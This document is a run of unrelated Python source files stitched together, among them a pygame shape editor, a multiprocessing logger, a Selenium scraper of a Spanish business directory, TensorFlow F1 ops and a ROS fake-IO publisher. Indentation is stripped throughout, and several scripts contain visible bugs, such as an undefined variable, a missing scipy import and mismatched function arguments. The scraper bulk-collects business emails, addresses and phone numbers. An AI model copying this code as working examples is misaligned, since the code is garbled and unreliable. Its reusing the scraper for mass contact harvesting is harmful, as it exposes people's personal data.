def moveshape(begin_x, begin_y, end_x, end_y, shapeid):
movex = end_x-begin_x
if movex >= 0:
movex = movex if max(shapelist[shapeid].end_x, shapelist[shapeid].begin_x)+movex <= 1100 else 0
else:
movex = movex if min(shapelist[shapeid].end_x, shapelist[shapeid].begin_x)+movex >= 100 else 0
movey = end_y-begin_y
if movey >= 0:
movey = movey if max(shapelist[shapeid].end_y, shapelist[shapeid].begin_y)+movey <= 700 else 0
else:
movey = movey if min(shapelist[shapeid].end_y, shapelist[shapeid].begin_y)+movey >= 100 else 0
shapelist[shapeid].end_x += movex
shapelist[shapeid].begin_x += movex
shapelist[shapeid].end_y += movey
shapelist[shapeid].begin_y += movey
print(str(shapeid))
print(shapelist[shapeid].shapestyle)
begin_x = begin_y = end_x = end_y = 0
down = up = False
shapechooseid = -1
while True:
screen.fill(white)
makebutton()
pygame.mouse.set_cursor(*pygame.cursors.arrow)
for event in pygame.event.get():
if event.type == QUIT:
sys.exit()
elif event.type == KEYUP:
if event.key == pygame.K_ESCAPE:
sys.exit()
elif event.type == MOUSEBUTTONUP:
mouse_up_x, mouse_up_y = event.pos
if 10 <= mouse_up_x <= 60 and 10 <= mouse_up_y <= 60:
shapestyle = "rectangle"
move = False
elif 10 <= mouse_up_x <= 60 and 80 <= mouse_up_y <= 130:
shapestyle = "square"
move = False
elif 10 <= mouse_up_x <= 60 and 150 <= mouse_up_y <= 200:
shapestyle = "circle"
move = False
elif 10 <= mouse_up_x <= 60 and 220 <= mouse_up_y <= 270:
shapestyle = "ellipse"
move = False
elif 10 <= mouse_up_x <= 60 and 290 <= mouse_up_y <= 340:
shapestyle = ""
move = True
if down == True:
end_x = max(mouse_up_x, 100) if mouse_up_x < 600 else min(mouse_up_x, 1100)
end_y = max(mouse_up_y, 100) if mouse_up_y < 400 else min(mouse_up_y, 700)
down = False
up = True
if shapestyle:
save_shape(begin_x, begin_y, end_x, end_y)
begin_x = begin_y = end_x = end_y = 0
elif event.type == MOUSEMOTION:
mouse_x, mouse_y = event.pos
if 100 < mouse_x < 1100 and 100 < mouse_y < 700:
if down:
end_x = mouse_x
end_y = mouse_y
draw_realy = False
elif event.type == MOUSEBUTTONDOWN:
mouse_down_x, mouse_down_y = event.pos
if 100 < mouse_down_x < 1100 and 100 < mouse_down_y < 700:
if shapestyle:
down = True
up = False
begin_x = mouse_down_x
begin_y = mouse_down_y
if move:
down = True
up = False
begin_x = mouse_down_x
begin_y = mouse_down_y
shapechooseid = judgemoveshape(begin_x, begin_y)
if shapechooseid == None:
shapechooseid = -1
if down == True and begin_x >= 100 and begin_y >= 100 and end_x >= 100 and end_y >= 100:
if shapestyle:
model().judge_draw_shape(begin_x, begin_y, end_x, end_y, shapestyle)
elif move and shapechooseid >= 0:
moveshape(begin_x, begin_y, end_x, end_y, shapechooseid)
begin_x = end_x
begin_y = end_y
print(shapechooseid)
for each in shapelist:
each.draw()
# print(rectangle, square, circle, ellipse)
pygame.display.update() |
"""
A set of classes for logging in multiprocessing environments. The logging system in this case includes two entities:
server and queued logger, which are connected with a multiprocessing queue. Server is represented by LoggingServer
class and a queued logger is represented by QueuedLogger class. In this model, a pair of connected server and queue
share the same name and can be accessed with get_server() and get_logger() functions.
QueuedLogger is a subclass of standard logging.Logger class and from the user side can be used as a usual logger.
The handlers and formatters are set on the server side via set_server_logger_initializer() function. An attempt to add
formatters or handlers to QueuedLogger instance will cause NotImplementedError.
The simplest workflow is:
1. Write a logger_initializer() function which sets up logging system from standard Python library and returns a logger
which will handle all messages for a server;
2. In the main process, call the function set_server_logger_initializer(logger_initializer=logger_initializer). It will
create a server and a queued logger, if they do not exist already.
3. Create subclass of multiprocessing.Process. In the constructor, create an attribute for the logger:
self.mp_logger = get_logger(). It is important to do it in the parent process, before you call start() function!
4. Start the server: start_server().
5. Start your process and use self.mp_logger as if it is a standard logger!
Notes:
- You can call start_server() before or after you child process is started or even before self.mp_logger = get_logger().
But it is preferable to start the server as early as possible so that the queue does not get filled.
- You can use multiple servers (with different loggers). To do this, just pass the logger name (a string) to the
corresponding functions.
- You should consider calling set_server_init_params() and set_logger_init_params() functions before you set up
anything.
- The servers are stopped when the main process finishes. Make sure that you have joined you subprocesses or you may
lose log messages or get deadlocks.
"""
import atexit
import logging
import time
from multiprocessing import Queue, Lock
from Queue import Empty, Full
from ..concurrency.abstract_process_worker import AbstractProcessWorker
DEFAULT_NAME = "default"
def set_server_init_params(**kwargs):
"""
Set initialization parameters for all new LoggingServer instances.
:param kwargs: initialization arguments. See LoggingServer constructor.
"""
_manager.set_server_init_params(**kwargs)
def set_logger_init_params(**kwargs):
"""
Set initialization parameters for all new QueuedLogger instances.
:param kwargs: initialization arguments. See QueuedLogger constructor.
"""
_manager.set_logger_init_params(**kwargs)
def get_server(server_name=DEFAULT_NAME):
"""
Get the logging server with the name specified by server_name. If it does not exist, new server and a corresponding
logger are created.
:param server_name: name of the server.
:return: an instance of LoggingServer.
"""
return _manager.get_server(server_name)
def get_logger(logger_name=DEFAULT_NAME):
"""
Get the logger with the name specified by logger_name. If it does not exist, new logger and a corresponding server
are created.
:param logger_name: name of the queued logger.
:return: an instance of QueuedLogger.
"""
return _manager.get_logger(logger_name)
def set_server_logger_initializer(server_name=DEFAULT_NAME, logger_initializer=None):
"""
Set the initializer for the internal logger of the server. The internal logger is the "regular" logger from the
standard logging module. It is used to process all LogRecords which were passed through the queue to the server.
:param server_name: name of the server.
:param logger_initializer: a callable returning a logging.Logger instance (and performing other standard logging
setup operation, e.g.handlers and formatters setting).
"""
server = _manager.get_server(server_name)
server.logger_initializer = logger_initializer
def start_server(server_name=DEFAULT_NAME):
"""
Start a server with a given name. If it does not exist, new server and a corresponding logger are created.
Use set_server_init_params() to set initialization parameters.
:param server_name:
"""
server = _manager.get_server(server_name)
server.start()
def stop_server(server_name=DEFAULT_NAME):
"""
Stop a server with a given name. If it does not exist, it will be created.
Use set_server_init_params() to set initialization parameters.
:param server_name: name of the server to stop
"""
server = _manager.get_server(server_name)
server.stop()
def stop_all_servers():
"""
Stop all logging servers. May cause deadlock if some child processes are writing logs to queued loggers.
This function is called when the main process finishes, but it is NOT called when the program is killed by a signal
not handled by Python, when a Python fatal internal error is detected, or when os._exit() is called.
See: https://docs.python.org/2.7/library/atexit.html
"""
_manager.stop_all_servers()
# Stop all the loggers when the main process finishes
# Note that this will not work if the program is killed by a signal not handled by Python, when a Python fatal internal
# error is detected, or when os._exit() is called.
# See: https://docs.python.org/2.7/library/atexit.html
atexit.register(stop_all_servers)
class Manager(object):
"""
The internal class that aggregates all instances of QueuedLogger and LoggingServer.
Generally, there is no need to create instances of this class outside this module.
"""
def __init__(self):
"""
Initialize new manager.
"""
self.servers_and_loggers = {}
self.server_init_params = {}
self.logger_init_params = {}
def set_server_init_params(self, **kwargs):
"""
Set initialization parameters for all new LoggingServer instances.
:param kwargs: initialization arguments. See LoggingServer constructor.
"""
self.server_init_params = kwargs
def set_logger_init_params(self, **kwargs):
"""
Set initialization parameters for all new QueuedLogger instances.
:param kwargs: initialization arguments. See QueuedLogger constructor.
"""
self.logger_init_params = kwargs
def get_server(self, name):
"""
Get LoggingServer with a specified name. If it does not exist, new server and a corresponding logger are
created.
:param name: name of the logging server.
:return: LoggingServer instance
"""
if name not in self.servers_and_loggers:
self._new_server_and_logger(name)
return self.servers_and_loggers[name][0]
def get_logger(self, name):
"""
Get QueuedLogger with a specified name. If it does not exist, new server and a corresponding logger are created.
:param name: name of the queued logger
:return: QueuedLogger instance
"""
if name not in self.servers_and_loggers:
self._new_server_and_logger(name)
return self.servers_and_loggers[name][1]
def stop_all_servers(self):
"""
Stop all logging servers. May cause deadlock if some child processes are writing logs to queued loggers.
"""
for server, __ in self.servers_and_loggers.values():
server.stop()
def _new_server_and_logger(self, name):
new_server = LoggingServer(name, **self.server_init_params)
new_logger = QueuedLogger(name, **self.logger_init_params)
new_logger.queue = new_server.queue
self.servers_and_loggers[name] = (new_server, new_logger)
_manager = Manager()
class QueuedLogger(logging.getLoggerClass()):
"""
The proxy class. Its instances behave like logging.Logger objects, but all it does is forwarding LogRecords to
the queue (and thus to the server).
"""
def __init__(self, name, level=logging.NOTSET, handle_timeout=None):
"""
A "client-side" logger which forwards all log records to the corresponding server.
Be careful if handle_timeout is None, the call may block. If the corresponding server is not running
(or crashed) a deadlock may occur.
:param name: name of this logger (and the corresponding LoggingServer instance) in the module internal
data structure.
:param level: log level (see docs for logging standard module)
:param handle_timeout: timeout for the logger-server queue. If not None, the message may be lost
"""
super(QueuedLogger, self).__init__(name, level)
self.handle_timeout = handle_timeout
self.queue = None
def handle(self, record):
try:
self.queue.put(record, timeout=self.handle_timeout)
except (Full, AttributeError):
pass # TODO If needed, add a callback (optional)
def addHandler(self, hdlr):
raise NotImplementedError
def removeHandler(self, hdlr):
raise NotImplementedError
def callHandlers(self, record):
raise NotImplementedError
def getChild(self, suffix):
raise NotImplementedError
class LoggingServer(AbstractProcessWorker):
"""
This class aggregates all LogRecords from different processes and moves them to a single logger,
If the logger was not initialized, the server will "swallow" the messages without outputting them.
"""
def __init__(self, name, qsize=0, queue_timeout=0.1, logger_initializer=None):
"""
Create a new logging server.
:param name: name of the logging server (and corresponding QueuedLogger instance) in the module internal
data structure.
:param qsize: size of the input queue.
:param queue_timeout: queue query timeout. It is not very important, 0.1 second is a reasonable value for
most cases
:param logger_initializer: a callable objects that sets up logging and returns an instance of logging.Logger,
that is used to write logs
"""
# super(AbstractProcessWorker, self).__init__()
AbstractProcessWorker.__init__(self)
self.queue = Queue(qsize)
self.name = name # By the way it overrides the multiprocessing.Process.name
self.logger_initializer = logger_initializer
self._logger = None
self._lock = Lock()
self._lock_is_mine = False
self._queue_timeout = queue_timeout
def on_start(self):
if not self._lock.acquire(block=False):
raise RuntimeError("Only one LoggingServer should run at the same time!")
self._lock_is_mine = True
if self.logger_initializer is not None:
self._logger = self.logger_initializer()
if self._logger is not None:
self._logger.info("Logging server '{}' started. PID: {}".format(self.name, self.pid))
def do_work_once(self):
try:
log_record = self.queue.get(timeout=self._queue_timeout)
except Empty:
return
# Forward the log_record to the internal _logger
if self._logger is not None:
self._logger.handle(log_record)
def on_finish(self):
# Release the lock
if self._lock_is_mine: # Any process can release a "foreign" lock so we have a flag
self._lock_is_mine = False
self._lock.release()
if self._logger is not None:
self._logger.info("Logging server '{}' finished. PID: {}".format(self.name, self.pid))
def on_crash(self):
if self._logger is not None:
self._logger.exception("Logging server '{}' crashed. PID: {}".format(self.name, self.pid))
def stop(self):
"""
Stop the logging server if it runs. Does nothing, is the server is not running.
"""
# Wait until the queue is empty
while not self.queue.empty():
time.sleep(0.1)
# Shutdown the server (someone may put something to a queue - it is not our problem)
self.deactivate()
try:
self.join()
except AssertionError:
pass
|
import math
def polygon_area(ns, ls):
length = ls ** 2
t = math.pi/ns
tr = math.tan(t)
return ns * length / tr / 4
print polygon_area(7, 3) |
import random
import numpy as np
from numpy import pi, exp, cos
import os
import time as time
import sys
from datetime import datetime
from bqpe import *
M_range = np.linspace(1, 100, 100, dtype = int)
Attempts = 100
pres = 5*10**-3
MaxR = 1/pres**2
from progress.bar import ShadyBar
bar = ShadyBar('Generating:', max = Attempts * len(M_range), suffix = '%(percent).2f%%')
data = []
Alpha_List = -np.log(M_range)/np.log(pres)
Alpha_Values = [min(1, x) for x in Alpha_List]
for alpha in Alpha_Values:
failures = 0
idx = 0
while idx < Attempts:
r = random.uniform(-pi, pi)
# start = time.time()
flag, est, error, runs, sig = bqpe_analytical(threshold = pres, Phi = r, Alpha = alpha, sigma = pi / 4, Max_Runs = MaxR)
# end = time.time()
if flag == 1:
failures+=1
idx+=1
bar.next()
# else:
# print('failed')
data.append(failures/Attempts)
bar.finish()
# print(data)
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "helvetica"
plt.plot(M_range, data, linewidth = 2)
plt.grid(True)
plt.xlabel('Max M', fontsize = 15)
plt.ylabel('Rate of failure', fontsize = 15, labelpad = 5)
plt.xticks(fontsize = 12)
plt.yticks(fontsize = 12)
plt.legend(fontsize = 12)
plt.savefig('FailureRate_M_Uncapped.png', bbox_inches = 'tight')
plt.clf() |
from django.urls import path
from . import views
urlpatterns = [
path('campus/', views.campus_page, name='campus_page'),
]
|
#Ryan Ulsberger
#October 24, 2014
#Challenge Exercise 4 Chapter 5
import arcpy
from arcpy import env
env.workspace = "C:/MS_GST/TGIS_501/lab4/Exercise05"
extension_spatial = arcpy.CheckExtension("Spatial")
extension_net = arcpy.CheckExtension("Network")
extension_3d = arcpy.CheckExtension("3D")
my_extensions = [extension_spatial, extension_net, extension_3d]
available_extensions = []
for extension in my_extensions:
if extension == "Available":
print "Available"
available_extensions.append(my_extensions)
elif extension == "NotLicensed":
print "not Licensed"
print available_extensions
|
# use gensim to summarize then use scispacy to find words then build hypernymy / synonymy substition with cuDF hypernymy tree
import gensim
import spacy
spacy.prefer_gpu()
nlp = spacy.load("en_core_sci_sm")
text = """
Myeloid derived suppressor cells (MDSC) are immature
myeloid cells with immunosuppressive activity.
They accumulate in tumor-bearing mice and humans
with different types of cancer, including hepatocellular
carcinoma (HCC).
"""
embeddings_file = 'word_embeddings/word2vec/GoogleNews-vectors-negative300.bin'
model = gensim.models.Word2Vec.load("GoogleNews-vectors-negative300.bin.gz")
#doc = nlp(text)
#doc = nlp(text)
#print(doc.ents)
def replace_nouns(orig_text):
doc = nlp(orig_text)
new_text = ''
for sent in doc.sents:
for token in sent:
if token.pos_ in ['NOUN', 'PROPN'] and token.orth_ in model:
similar_words, _ = zip(*model.wv.most_similar(positive=[token.orth_]))
# Remove same lemma and words with underscore
similar_words = [w for w in similar_words if '_' not in w and list(nlp(w))[0].lemma_ != token.lemma_]
alt_word = similar_words[0] if len(similar_words) > 0 else token.orth_
new_text += alt_word + ' '
else:
new_text += token.orth_ + ' '
return new_text
replace_nouns(text)
print(new_text)
|
from flask import Flask, jsonify, request, render_template
import requests
import csv
import io
app = Flask("story_points_predictor", template_folder='templates')
json = ""
@app.route('/', methods=['GET'])
def get():
return render_template('index.html') |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-08-23 19:12
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0007_auto_20160823_2012'),
('messaging', '0008_auto_20160823_1103'),
]
operations = [
migrations.CreateModel(
name='FailedEmailMessage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email_message', django.contrib.postgres.fields.jsonb.JSONField()),
('reason', models.CharField(max_length=255)),
('retries', models.PositiveSmallIntegerField()),
('last_modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('owned_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.KITUser')),
],
),
migrations.CreateModel(
name='FailedSMSMessage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sms_message', django.contrib.postgres.fields.jsonb.JSONField()),
('reason', models.CharField(max_length=255)),
('retries', models.PositiveSmallIntegerField()),
('last_modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('owned_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.KITUser')),
],
),
]
|
import requests # pip install requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import urllib.request
from urllib.error import HTTPError
from urllib.error import URLError
from datetime import datetime
from socket import timeout
from requests.exceptions import ConnectionError
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import json, errno, os, time, glob, sys, codecs
# ------------------------------------------ LINK LETRAS ------------------------------------------
def loadLetras():
try:
file = open("letras.csv", "r")
for line in file:
letrasLista.append(line.strip())
file.close();
except (FileNotFoundError):
print('');
return
def saveLetras():
file = open('letras.csv',"w")
for valor in letrasLista:
if (valor not in hecha):
file.write(valor + '\n');
file.close();
return
# ------------------------------------------ LINK PAGINAS CATEGORIA ------------------------------------------
def loadPagesLiks():
try:
file = open("pageLinks.csv", "r")
for line in file:
linkLista.append(line.strip())
file.close();
except (FileNotFoundError):
print('');
return
def savePagesLiks():
file = open('pageLinks.csv',"w")
for valor in linkLista:
if (valor not in hechaLinks):
file.write(valor + '\n');
file.close();
return
# ------------------------------------------ LINK PAGINA INDIVIDUAL ------------------------------------------
def loadPagesLiksIndiv():
try:
file = open("pageLinksIndiv.csv", "r")
for line in file:
linksNegocios.append(line.strip())
file.close();
except (FileNotFoundError):
print('');
return
def savePagesLiksIndiv():
file = open('pageLinksIndiv.csv',"w")
for valor in linksNegocios:
if valor not in paginaEscaneada:
file.write(valor + '\n');
file.close();
return
# ------------------------------------------ CSV FILES ------------------------------------------
def saveResult():
file = open('resultado.csv',"w")
for valor in resultado:
file.write(valor + '\n');
file.close();
return
def loadStep():
letra = '';
try:
file = open('step.csv', "r")
for line in file:
letra = letra + line.strip();
file.close();
return json.loads(letra);
except (FileNotFoundError):
print('Error');
return json.loads('{ "letrasDONE":"false", "paginaletrasDONE":"false", "paginasnegociosDONE":"false" }');
def saveStep():
file = open('step.csv',"w")
file.write(json.dumps(jsonConfig));
file.close();
return
def descargarPaginasLetra():
browser = webdriver.Firefox()
browser.get('https://www.paginasamarillas.es/');
contenido = browser.find_element_by_css_selector('li.l-floatleft:nth-child(2) > a:nth-child(1)').click(); # Pagina principal
letras = browser.find_element_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul');
letras = letras.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul/li');
for aa in letras:
aa = aa.find_element_by_xpath('a');
letrasLista.append(aa.get_attribute("href"));
return
def descargarPaginasInicial(browser):
browser.get('https://www.paginasamarillas.es/');
contenido = browser.find_element_by_css_selector('li.l-floatleft:nth-child(2) > a:nth-child(1)').click(); # Pagina principal
letras = browser.find_element_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul');
letras = letras.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[1]/ul/li');
for aa in letras:
aa = aa.find_element_by_xpath('a');
letrasLista.append(aa.get_attribute("href"));
return
def descargarPaginasLetras(link, browser):
browser.get(link);
activ = browser.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[3]/ul/li'); # Pagina principal
for bb in activ:
bb = bb.find_element_by_xpath('a');
linkpagees = bb.get_attribute("href");
if linkpagees not in linkLista:
linkLista.append(linkpagees);
return activ;
def descargarPaginasEspecifica(link, browser):
pagina=1;
browser.get(link);
negocios = browser.find_elements_by_xpath('/html/body/div[1]/div[1]/section[1]/ul/li');
htmls = [];
for ne in negocios:
html = ne.get_attribute('innerHTML')
html = BeautifulSoup(html, 'html.parser');
html = html.find_all(class_='m-results-business--name')[0].find_all('a')[0]['href'];
if html not in linksNegocios:
htmls.append(html);
linksNegocios.append(html);
for lii in htmls:
descargarResultado(lii,browser);
while (len(negocios)>14):
browser.get(link + str(pagina));
negocios = browser.find_elements_by_xpath('/html/body/div[1]/div[1]/section[1]/ul/li');
htmls = [];
for ne in negocios:
html = ne.get_attribute('innerHTML')
html = BeautifulSoup(html, 'html.parser');
try:
html = html.find_all(class_='m-results-business--name')[0].find_all('a')[0]['href'];
if html not in linksNegocios:
htmls.append(html);
linksNegocios.append(html);
except :
html = ''
for lii in htmls:
descargarResultado(lii,browser);
pagina=pagina +1;
return;
def descargarResultado(link, browser):
browser.get(link);
valor = browser.page_source.split('data-business=')[1].split('data-power')[0];
valor = valor.replace(""","\"");
valor = valor.replace("\"",'',1) + 'FINNN';
valor = valor.replace('}}\" FINNN','}}');
d = json.loads(valor);
try:
email = d["customerMail"]
except :
email = ''
try:
name = d["info"]["name"]
except :
name = ''
try:
businessAddress = d["info"]["businessAddress"].replace(",",";")
except :
businessAddress = ''
try:
phone = d["info"]["phone"]
except :
phone = ''
try:
activity = d["info"]["activity"]
except :
activity = ''
tupla = email + ',' + name + ',' + businessAddress + ',' + phone + ',' + activity;
resultado.append( tupla )
saveResult();
#
#
# ********************************** Programa principal **********************************
#
#
letrasLista =[];
linkLista =[];
hecha =[];
hechaLinks=[];
linksNegocios=[];
paginaEscaneada = [];
resultado = [];
iterar = 0;
archi = 0;
browser = webdriver.Firefox()
jsonConfig = loadStep();
loadLetras();
loadPagesLiks();
print(jsonConfig);
if (jsonConfig["letrasDONE"] != 'true' ):
descargarPaginasInicial(browser);
jsonConfig["letrasDONE"]= 'true';
saveStep();
if (jsonConfig["paginaletrasDONE"] != 'true' ):
for aa in letrasLista:
browser.get(aa);
activ = browser.find_elements_by_xpath('//*[@id="content-inner"]/div[2]/div[3]/ul/li'); # Pagina principal
pagina=1;
while (len(activ)>14):
activ = descargarPaginasLetras( aa.replace("_1","_"+str(pagina)),browser );
savePagesLiks();
pagina=pagina +1;
hecha.append(aa);
saveLetras();
jsonConfig["paginaletrasDONE"]= 'true';
saveStep();
loadPagesLiksIndiv();
if (jsonConfig["paginasnegociosDONE"] != 'true' ):
for bb in linkLista:
descargarPaginasEspecifica(bb, browser);
savePagesLiksIndiv();
hechaLinks.append(bb);
savePagesLiks();
jsonConfig["paginasnegociosDONE"]= 'true';
saveStep();
|
from flask import Flask, request, send_file
from qrbill.bill import QRBill
from io import BytesIO, StringIO
app = Flask(__name__)
@app.route('/')
def main():
try:
payment_parts = QRBill(
account=request.args.get('account'),
amount=request.args.get('amount'),
currency=request.args.get('currency'),
due_date=request.args.get('due-date'),
creditor={
'name': request.args.get('creditor-name'),
'line1': request.args.get('creditor-line1'),
'line2': request.args.get('creditor-line2'),
'street': request.args.get('creditor-street'),
'house_num': request.args.get('creditor-house-num'),
'pcode': request.args.get('creditor-pcode'),
'city': request.args.get('creditor-city'),
'country': request.args.get('creditor-country')
},
debtor={
'name': request.args.get('debtor-name'),
'line1': request.args.get('debtor-line1'),
'line2': request.args.get('debtor-line2'),
'street': request.args.get('debtor-street'),
'house_num': request.args.get('debtor-house_num'),
'pcode': request.args.get('debtor-pcode'),
'city': request.args.get('debtor-city'),
'country': request.args.get('debtor-country')
},
ref_number=request.args.get('ref-number'),
extra_infos=request.args.get('extra-infos'),
alt_procs=request.args.get('alt-procs', '').split(','),
language=request.args.get('language'),
top_line=request.args.get('top_line'),
payment_line=request.args.get('payment_line')
)
response = StringIO()
payment_parts.as_svg(response)
return send_file(
BytesIO(response.getvalue().encode('utf-8')),
mimetype='image/svg+xml'
)
except ValueError as e:
return str(e)
|
# coding:utf-8
import xadmin
from .models import Experiment
class ExperimentAdmin(object):
list_display = ['name', 'degree','images','port','category', 'students',]
search_fields = ['name', 'degree', 'category']
list_filter = ['degree', 'category','click_nums', 'fav_nums', 'students','add_time']
ordering = ['-click_nums']
readonly_fields = ['click_nums', 'fav_nums', 'students']
xadmin.site.register(Experiment,ExperimentAdmin) |
#!/usr/bin/env python
"""
File: ops
Date: 11/21/18
Author: Jon Deaton (jdeaton@stanford.edu)
"""
import tensorflow as tf
def f1(y_true, y_pred):
with tf.variable_scope("macro-f1-score"):
y_pred = tf.cast(y_pred, tf.float32)
tp = tf.reduce_sum(y_true * y_pred, axis=0)
tn = tf.reduce_sum((1 - y_true) * (1 - y_pred), axis=0)
fp = tf.reduce_sum((1 - y_true) * y_pred, axis=0)
fn = tf.reduce_sum(y_true * (1 - y_pred), axis=0)
p = tp / (tp + fp + tf.keras.backend.epsilon())
r = tp / (tp + fn + tf.keras.backend.epsilon())
f1 = 2 * p * r / (p + r + tf.keras.backend.epsilon())
f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)
return tf.reduce_mean(f1)
def f1_cost(y_prob, y_true):
with tf.variable_scope("macro-f1-loss"):
tp = tf.reduce_sum(y_true * y_prob, axis=0)
tn = tf.reduce_sum((1 - y_true) * (1 - y_prob), axis=0)
fp = tf.reduce_sum((1 - y_true) * y_prob, axis=0)
fn = tf.reduce_sum(y_true * (1 - y_prob), axis=0)
p = tp / (tp + fp + tf.keras.backend.epsilon())
r = tp / (tp + fn + tf.keras.backend.epsilon())
f1 = 2 * p * r / (p + r + tf.keras.backend.epsilon())
f1 = tf.where(tf.is_nan(f1), tf.zeros_like(f1), f1)
return 1 - tf.reduce_mean(f1)
def inception_module(input, filters, kernels):
with tf.variable_scope("Inception"):
l = input
convs = list()
for kernel in kernels:
l = ConvReLu(l, filters, kernel)
convs.append(l)
return tf.concat(values=convs, axis=1, name="concat")
def ConvReLu(input, filters, kernel):
# with tf.variable_scope("ConvReLu"):
kernel_initializer = tf.truncated_normal_initializer(stddev=5e-2, dtype=tf.float32)
bias_initializer = tf.zeros_initializer(dtype=tf.float32)
l = tf.layers.conv2d(input,
filters=filters, kernel_size=kernel, strides=(1, 1), padding='same',
data_format='channels_first', activation=None, use_bias=True,
kernel_initializer=kernel_initializer, bias_initializer=bias_initializer)
return tf.nn.relu(l)
def MaxPooling2D(x):
return tf.layers.max_pooling2d(x, pool_size=(2, 2), strides=2, data_format='channels_first')
|
#!/usr/bin/python
#\file send_fake_io1.py
#\brief Sending a fake IO states (digital in).
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Apr.20, 2021
import roslib
import rospy
import std_msgs.msg
import std_srvs.srv
#roslib.load_manifest('ur_dashboard_msgs')
#import ur_dashboard_msgs.msg
roslib.load_manifest('ur_msgs')
import ur_msgs.msg
def SendFakeDigitalInDignal(signal_idx, signal_trg):
pub_io_states= rospy.Publisher('/ur_hardware_interface/io_states', ur_msgs.msg.IOStates, queue_size=10)
rospy.sleep(0.2)
msg= ur_msgs.msg.IOStates()
msg.digital_in_states= [ur_msgs.msg.Digital(pin,False) for pin in range(18)]
msg.digital_out_states= [ur_msgs.msg.Digital(pin,False) for pin in range(18)]
msg.flag_states= [ur_msgs.msg.Digital(pin,False) for pin in range(2)]
msg.analog_in_states= [ur_msgs.msg.Analog(pin,0,0) for pin in range(2)]
msg.analog_out_states= [ur_msgs.msg.Analog(pin,0,0) for pin in range(2)]
msg.digital_in_states[signal_idx]= ur_msgs.msg.Digital(signal_idx,signal_trg)
#print 'msg='
#print msg
pub_io_states.publish(msg)
#pub_digital= rospy.Publisher('/ur_hardware_interface/io_states', ur_msgs.msg.Digital, queue_size=10)
#msg= ur_msgs.msg.Digital(2,True)
#print 'msg='
#print msg
#pub_digital.publish(msg)
if __name__=='__main__':
rospy.init_node('send_fake_io1')
SendFakeDigitalInDignal(3, True)
#rate= rospy.Rate(10)
#for i in range(3):
#SendFakeDigitalInDignal(3, True)
#print '=============',i,'============='
#rate.sleep()
##rospy.spin()
|
from constants import *
import numpy as np
from sympy.solvers import solve
from sympy import Symbol
from scipy.signal import correlate
# takes multiple audio feeds (for the same sound) of the form
# (position, numpyarray)
# and calculates the approximate position of the sound
def localize(mics):
for index1, mic1 in enumerate(mics):
for index2, mic2 in enumerate(mics):
if index1 != index2:
# find the most likely distance difference (highest cross-correlation peak)
position1, audio1 = mic1
position2, audio2 = mic2
corr_distance = find_distance(position1, audio1, position2, audio2)
def find_distance(position1, audio1, position2, audio2):
"""Returns the difference in the distances based on mic positions and the audios they heard"""
correlation = scipy.signal.correlate(audio1, audio2)
max_time = np.argmax(correlation) / sampling_rate
return max_time * speed_of_sound
|
#!/usr/bin/env python
def story(**kwds):
return 'Once upon a time, there was a' \
'%(job)s called %(name)s.' % kwds
story(job='king',name='Gummy')
params={'job':'language','name':'Python'}
story(**params)
del params['job']
story(job='stroke of genius',**params)
##############################################
def power(x,y,*others):
if others:
print 'Received redundant parameters:', others
return pow(x,y)
print power(3,2)
print power(y=3,x=2)
params=(5,) * 2
print power(*params)
print power(3,3,'Hello,World')
|
import re
import json
class GenericFormatter(object):
NAME = "Generic"
@staticmethod
def decode(raw):
pattern = re.compile(r"\d+")
result = map(int, re.findall(pattern, raw))
return json.dumps(result)
@staticmethod
def representation(encoded):
values = json.loads(encoded)
return "-".join(values[:-1]) |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys,math,os,random
__all__ = []
__all__.append("parse_and_apply")
def parse_and_apply(arguments):
directori,filename,y_min,bootstrap = arguments.split()
filename = os.path.join(directori, filename)
print >> sys.stderr, "calling main for", filename
y_min = float(y_min)
main(filename, y_min, bootstrap)
def get_data(filename):
lines = open(filename,'r').readlines()
data = [line.split() for line in lines]
data = [float(line[4-1]) for line in data]
return data
def lambda_normalitzacio(xs, x_min):
def lambda_(xs, x_min):
"Estimació de la lambda segons el max Likelihood."
suma = 0.
for x in xs:
suma = suma + (x - x_min)
n = float(len(xs))
return n / suma
lambda_ = lambda_(xs, x_min)
normalitzacio = lambda_ / math.exp( - lambda_ * x_min)
return lambda_, normalitzacio
def least_resamplings(xs):
n = len(xs)
logn = math.log(n)
return n * logn * logn
def resample(xs, length=None):
if length is None: length = len(xs)
return [random.choice(xs) for i in range(length)]
def estadistica(bootstrap_data):
b_exp, b_norm = 0., 0.
norm_ = 1. / float(len(bootstrap_data))
for exp, norm in bootstrap_data:
b_exp = b_exp + norm_ * exp
b_norm = b_norm + norm_ * norm
b_sigma_exp, b_sigma_norm = 0., 0.
for exp, norm in bootstrap_data:
b_sigma_exp = b_sigma_exp + norm_ * (exp - b_exp) * (exp - b_exp)
b_sigma_norm = b_sigma_norm + norm_ * (norm - b_norm) * (norm - b_norm)
b_sigma_exp = math.sqrt(b_sigma_exp)
b_sigma_norm = math.sqrt(b_sigma_norm)
return b_exp,b_sigma_exp,b_norm,b_sigma_norm
__all__.append("main")
def main(filename, bootstrap=False, out=None):
bootstrap_data = []
data = get_data(filename)
ys = [dada for dada in data if dada != 0.]
y_min = min(ys)
lambda_, normalitzacio = lambda_normalitzacio(ys, y_min)
print y_min, lambda_, normalitzacio
# guardo resultats
class Results: pass
results = Results()
